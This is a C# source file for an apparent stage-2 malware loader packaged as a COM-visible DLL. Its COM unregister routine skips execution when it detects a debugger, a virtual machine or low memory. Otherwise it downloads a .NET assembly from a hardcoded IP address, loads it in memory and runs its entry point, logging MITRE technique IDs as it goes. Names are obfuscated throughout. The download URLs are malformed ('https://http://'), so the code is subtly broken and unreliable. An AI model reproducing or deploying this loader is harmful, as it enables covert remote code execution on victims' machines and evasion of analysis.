using System;
using System.Net;
using System.Runtime.InteropServices;
using System.Reflection;
using System.IO;
using System.Diagnostics;
using Microsoft.Win32;
using System.Threading;

[ComVisible(true)]
[Guid("1A3B5C7D-8E9F-0A1B-2C3D-4E5F6A7B8C9D")]
public class Xyzwq
{
    private const string zxddff = "http://100.111.22.117:8000";
    private const string qwmnb = "1073";
    private const string kjhtr = "10";
    private const string plmvc = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    private const string vbnml = "https://http://100.111.22.117:8000/stage/1073/3?endpoint_id=10";
    private const int tyunm = 7777;
    
    [ComUnregisterFunction]
    public static void Fghjk(Type t)
    {
        if (Qwerty()) return;
        
        string lkjhg = Environment.GetEnvironmentVariable("APPDATA");
        string poiuy = Path.Combine(lkjhg, qwmnb);
        
        try
        {
            if (!Directory.Exists(poiuy))
                Directory.CreateDirectory(poiuy);
                
            string mnbvc = $"{DateTime.Now:yyyyMMddHHmmss}-Log.txt";
            string zxcvb = Path.Combine(poiuy, mnbvc);
            
            string qazws = $"https://{zxddff}/stage/{qwmnb}/3?endpoint_id={kjhtr}";
            byte[] edcrf = Wsxed(qazws);
            
            if (edcrf == null || edcrf.Length == 0)
            {
                Asdfg(zxcvb, $"{kjhtr}-{qwmnb}-T1105=0");
                return;
            }
            
            Asdfg(zxcvb, $"{kjhtr}-{qwmnb}-T1105=1");
            
            Assembly rfvtg = Assembly.Load(edcrf);
            
            if (rfvtg.EntryPoint != null)
            {
                object[] yhnuj = null;
                if (rfvtg.EntryPoint.GetParameters().Length > 0)
                    yhnuj = new object[] { new string[0] };
                    
                rfvtg.EntryPoint.Invoke(null, yhnuj);
                Asdfg(zxcvb, $"{kjhtr}-{qwmnb}-T1620=1");
            }
            else
            {
                Asdfg(zxcvb, $"{kjhtr}-{qwmnb}-T1620=0");
            }
        }
        catch
        {
            try
            {
                string lkjhg2 = Environment.GetEnvironmentVariable("APPDATA");
                string poiuy2 = Path.Combine(lkjhg2, qwmnb);
                if (Directory.Exists(poiuy2))
                {
                    string mnbvc2 = $"{DateTime.Now:yyyyMMddHHmmss}-Log.txt";
                    string zxcvb2 = Path.Combine(poiuy2, mnbvc2);
                    Asdfg(zxcvb2, $"{kjhtr}-{qwmnb}-T1105=0");
                }
            }
            catch { }
        }
    }
    
    private static byte[] Wsxed(string ujmik)
    {
        try
        {
            using (WebClient ioklp = new WebClient())
            {
                ioklp.Headers["User-Agent"] = plmvc;
                ioklp.Proxy = null;
                return ioklp.DownloadData(ujmik);
            }
        }
        catch
        {
            Thread.Sleep(new Random().Next(2000, 5000));
            try
            {
                using (WebClient ioklp = new WebClient())
                {
                    ioklp.Headers["User-Agent"] = plmvc;
                    ioklp.Proxy = null;
                    return ioklp.DownloadData(ujmik);
                }
            }
            catch { return null; }
        }
    }
    
    private static void Asdfg(string plmko, string ijnbh)
    {
        try
        {
            File.AppendAllText(plmko, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {ijnbh}\n");
        }
        catch { }
    }
    
    private static bool Qwerty()
    {
        try
        {
            if (Debugger.IsAttached || Debugger.IsLogging())
                return true;
                
            using (var ujmik = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion", false))
            {
                if (ujmik?.GetValue("ProductName")?.ToString().Contains("Virtual") == true)
                    return true;
            }
            
            long azsxd = new Microsoft.VisualBasic.Devices.ComputerInfo().TotalPhysicalMemory;
            if (azsxd < 2147483648)
                return true;
                
            return false;
        }
        catch { return false; }
    }
}